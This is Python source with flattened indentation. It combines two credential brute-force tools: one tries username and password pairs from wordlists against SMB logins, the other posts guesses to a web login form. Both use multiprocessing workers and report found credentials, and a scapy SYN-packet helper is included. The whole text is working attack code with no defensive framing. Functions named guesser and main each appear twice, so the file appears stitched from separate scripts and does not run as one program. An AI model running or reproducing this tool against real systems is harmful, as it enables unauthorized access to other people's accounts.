def check_config(args, config):
"""Parse all our settings and return sanitised hook information, also check
for argument and config file correct-ness"""
# Work out what hook is being used and report
if args.web_hook_url:
job_hook = args.web_hook_url
nm = job_hook
else:
try:
nm = config[
'default_hook'] if args.web_hook == 'default' else args.web_hook
job_hook = config['hook_urls'][nm]
except Exception as e:
bcolors.err(
"Error parsing webhook from config file:\n{}".format(e))
bcolors.warn("Exiting")
exit()
# Get user information from config
try:
job_user = config['instance_info']
except Exception as e:
bcolors.err("Error getting User Config:\n{}".format(e))
bcolors.warn("Continuing without user information")
job_user = None
return nm, job_hook, job_user
def single_crack(bruter, single, single_first, login_q, len_q):
i = 0
try:
n_bruter = file_len(bruter)
if single_first:
bc.info("Attempting login for 1 user and {} passwords.".format(n_bruter), True)
else:
bc.info("Attempting login for {} users and 1 password.".format(n_bruter), True)
len_q.put(n_bruter)
#For each line in the file, bang it in the queue
with open(bruter, 'r', encoding='latin-1') as bl:
#with open(bruter, 'r', encoding='utf-8') as bl:
for b in bl:
b = b.strip()
if not b: continue
i+=1
if single_first:
login_q.put([single, b])
else:
login_q.put([b, single])
except UnicodeDecodeError as e:
bc.err("Error decoding on wordlist line {}\n{}.".format(i, e))
bc.warn("Skipping guess")
except BrokenPipeError as e:
bc.err("Error communicating between processes : {}".format(e))
bc.info("Continuing")
except ConnectionResetError as e:
bc.err("Error communicating between processes : {}".format(e))
bc.info("Continuing")
except KeyboardInterrupt:
return
def double_crack(login_list, password_list, login_q, len_q):
i = 0
j = 0
try:
n_login = file_len(login_list)
n_pass = file_len(password_list)
bc.info("Attempting login for {} users and {} passwords.".format(n_login, n_pass), True)
len_q.put(n_login*n_pass)
#For each line in the file, bang it in the queue
with open(login_list, 'r', encoding='latin-1') as ul:
for u in ul:
u = u.strip()
if not u: continue
i += 1
with open(password_list, 'r', encoding='latin-1') as pl:
for p in pl:
p = p.strip()
if not p: continue
j += 1
login_q.put([u, p])
except UnicodeDecodeError as e:
bc.err("Error decoding at login_list line {} & password_list line {}\n{}.".format(i,j, e))
bc.warn("Skipping guess")
except BrokenPipeError as e:
bc.err("Error communicating between processes : {}".format(e))
bc.info("Continuing")
except ConnectionResetError as e:
bc.err("Error communicating between processes : {}".format(e))
bc.info("Continuing")
except KeyboardInterrupt:
return
def get_config(config_file):
try:
with open(config_file, 'r') as y:
config = yaml.load(y, Loader=yaml.FullLoader)
except Exception as e:
bcolors.err("Error getting yaml configuration:\n{}".format(e))
bcolors.warn("Exiting")
exit()
return config
def send_syn(host, port):
syn_response = None
try:
#Send it, no waiting!
syn_response = sr(IP(dst=host) / TCP(dport=port, flags='S'), timeout=0)
except Exception as e:
bc.err("Could not send SYN to {}:{} : \n{}".format(host, port, e))
bc.warn("Check you have permissions to craft packets.")
bc.err("Exiting.")
sys.exit(0)
#TODO validate Syn response and return 0 open, or 1 for closed/filtered
return syn_response
def guesser(url, fmt_str, hdr, login_q, sM, sX, kill_flag, struck_gold, done_q):
while True:
rd = None
if kill_flag.is_set():
return
try:
rd = login_q.get_nowait()
if not rd: continue #Because sometimes the queue has null in it
#bc.info("got {} from queue".format(rd))
data = fmt_str.format(rd[0], rd[1])
#bc.info("Sending request.\nurl = {}\ndata = {}\nheaders = {}".format(url, data, hdr))
r = requests.post(url=url, data=data, headers=hdr)
#Check success
if (sM and sM in r.text) or (sX and sX not in r.text):
struck_gold.set()
bc.success("Credentials found!")
print("\t[ {} ] = {} [ {} ] = [ {} ]".format( \
bc.bold_format('User'), bc.green_format(str(rd[0]), ''), \
bc.bold_format('Password'), bc.green_format(str(rd[1]), '')))
#Tell main loop we guessed one
done_q.put("One more thing tried!")
except EmptyErr:
pass
except BrokenPipeError as e:
if rd:
bc.warn("Error when trying credentials : {}\n{}".format(rd, e))
else:
pass
except ConnectionResetError as e:
if rd:
bc.warn("Error when trying credentials : {}\n{}".format(rd, e))
else:
pass
except requests.exceptions.ConnectionError as e:
bc.warn("Couldn't connect when trying credentials : {}\nCheck target host is up if error persists.\n{}".format(rd, e))
except KeyboardInterrupt:
return
def guesser(host, domain, port, login_q, timeout, kill_flag, struck_gold,
done_q):
"""A Method to be the target of worker threads, will read creds from a Queue
object and try them, telling another queue if it's successful"""
while True:
rd = None
if kill_flag.is_set():
return
try:
rd = login_q.get_nowait()
if not rd: continue #Because sometimes the queue has null in it
#bc.info("got {} from queue".format(rd))
direct_tcp = True if port == 445 else False
#Now try and login
smb = SMBConnection(username=rd[0],
password=rd[1],
my_name='',
remote_name='',
domain=domain,
use_ntlm_v2=True,
is_direct_tcp=direct_tcp)
login = smb.connect(host, port, timeout=timeout)
#Check success
if login:
struck_gold.set()
bc.success("Credentials found!")
print("\t[ {} ] = {} [ {} ] = [ {} ]".format( \
bc.bold_format('User'), bc.green_format(str(rd[0]), ''), \
bc.bold_format('Password'), bc.green_format(str(rd[1]), '')))
#Tell main loop we guessed one
#done_q.put("One more thing tried!")
except EmptyErr:
pass
except BrokenPipeError as e:
if rd:
print()
bc.warn("Pipe Error when trying credentials : {}\n{}".format(
rd, e))
else:
pass
except SMBTimeout as e:
if rd:
print()
bc.warn("SMB Timeout when trying credentials : {}\n{}".format(
rd, e))
else:
pass
except ProtocolError as e:
if rd:
print()
bc.warn(
"Protocol Error when trying credentials: {}\n{}".format(
rd, e))
else:
pass
except KeyboardInterrupt:
return
finally:
#Tell main loop we guessed one if rd
if rd:
done_q.put("One more thing tried!")
def main():
"""ACtually do the bruting"""
#Setup initial variables
args = get_args()
#SMB variables
t = args.timeout
#Get crack mode
crack_mode = get_crack_mode(args.login_list, \
args.password_list, args.login, args.password)
#If there's a bad file provided or some other error in crack_mode derivation
if not crack_mode: exit(0)
#Instantiate workers
m = multiprocessing.Manager()
login_q = m.Queue()
done_q = m.Queue()
len_q = m.Queue()
struck_gold = multiprocessing.Event()
kill_flag = multiprocessing.Event()
start_time = time()
for i in range(args.threads):
t = multiprocessing.Process(target=guesser, args=(args.host,\
args.domain, args.port, login_q, args.timeout, kill_flag, \
struck_gold, done_q))
t.start()
#Now we have mode, carry out attack in whatever way specified
if crack_mode == 'double':
double_mode = double_crack if not args.spray else spray
#double_crack(args.login_list, args.password_list, login_q, len_q)
t = multiprocessing.Process(target=double_mode,
args=(
args.login_list,
args.password_list,
login_q,
len_q,
))
elif crack_mode == 'user':
#single_crack(args.login_list, args.password, False, login_q, len_q)
t = multiprocessing.Process(target=single_crack,
args=(
args.login_list,
args.password,
False,
login_q,
len_q,
))
elif crack_mode == 'password':
#single_crack(args.password_list, args.login, True, login_q, len_q)
t = multiprocessing.Process(target=single_crack,
args=(
args.password_list,
args.login,
True,
login_q,
len_q,
))
else:
bc.err("Brute force mode invalid - {}. Exiting.".format(crack_mode))
kill_flag.set()
sleep(0.5)
exit(0)
bc.info("Workers initialised. Calculating effort required.")
#Start the bruteforce thread, reading passwords into the worker queue
t.start()
#When available get the number of guesses
n_guesses = len_q.get()
#bc.info("guesses total : {}".format(n_guesses))
last_progress = 0.0
with progressbar.ProgressBar(max_value=n_guesses) as bar:
while True:
try:
done = done_q.qsize()
except Exception as e:
bc.warn("Error when checking progress : {}".format(e))
bc.info("Continuing")
progress = round((done / n_guesses) * 100, 0)
if struck_gold.is_set() and not args.cont:
kill_flag.set()
bc.info("Creds found, continue flag not set. Finishing.")
break
elif progress >= 100.0 and login_q.empty():
kill_flag.set()
sleep(1)
print()
bc.info("Brute complete. Shutting down...")
break
else:
#Just waiting for a mate
bar.update(done)
sleep(1)
#Gracefully kill everything
for p in multiprocessing.active_children():
p.join(0.5)
def main():
#Setup initial variables
args = get_args()
#HTML Request Variables
#Request data
fmt_str = "{}={}&{}={}".format(args.user_param, "{}", args.pass_param, "{}")
if args.extra_param:
for a in args.extra_param:
fmt_str = fmt_str + "&{}".format(a[0])
#Headers
hdr = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "en-US,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Referer" : args.url,
"Content-Type" : "application/x-www-form-urlencoded",
"Connection" : "close",
}
#Get crack mode
crack_mode = get_crack_mode(args.login_list, \
args.password_list, args.login, args.password)
#If there's a bad file provided or some other error in crack_mode derivation
if not crack_mode : exit(0)
#Instantiate workers
m = multiprocessing.Manager()
login_q = m.Queue()
done_q = m.Queue()
len_q = m.Queue()
struck_gold = multiprocessing.Event()
kill_flag = multiprocessing.Event()
start_time = time()
for i in range(args.threads):
t = multiprocessing.Process(target=guesser, args=(args.url, fmt_str, hdr, \
login_q, args.success_match, args.success_exclude, \
kill_flag, struck_gold, done_q))
t.start()
#Now we have mode, carry out attack in whatever way specified
if crack_mode == 'double':
#double_crack(args.login_list, args.password_list, login_q, len_q)
t = multiprocessing.Process(target=double_crack, args=(
args.login_list, args.password_list, login_q, len_q, ))
elif crack_mode == 'user':
#single_crack(args.login_list, args.password, False, login_q, len_q)
t = multiprocessing.Process(target=single_crack, args=(
args.login_list, args.password, False, login_q, len_q, ))
elif crack_mode == 'password':
#single_crack(args.password_list, args.login, True, login_q, len_q)
t = multiprocessing.Process(target=single_crack, args=(
args.password_list, args.login, True, login_q, len_q, ))
else:
bc.err("Brute force mode invalid - {}. Exiting.".format(crack_mode))
kill_flag.set()
sleep(0.5)
exit(0)
bc.info("Workers initialised. Calculating effort required.")
#Start the bruteforce thread, reading passwords into the worker queue
t.start()
#When available get the number of guesses
n_guesses = len_q.get()
#bc.info("guesses total : {}".format(n_guesses))
last_progress = 0.0
with progressbar.ProgressBar(max_value= n_guesses) as bar:
while True:
try:
done = done_q.qsize()
except Exception as e:
bc.warn("Error when checking progress : {}".format(e))
bc.info("Continuing")
progress = round( (done / n_guesses ) * 100 , 0)
if struck_gold.is_set() and not args.cont:
kill_flag.set()
bc.info("Creds found, continue flag not set. Finishing.")
break
elif progress >= 100.0 and login_q.empty():
kill_flag.set()
sleep(1)
print()
bc.info("Brute complete. Shutting down...")
break
else:
#Just waiting for a mate
bar.update(done)
sleep(1)
#Gracefully kill everything
for p in multiprocessing.active_children():
p.join(0.5)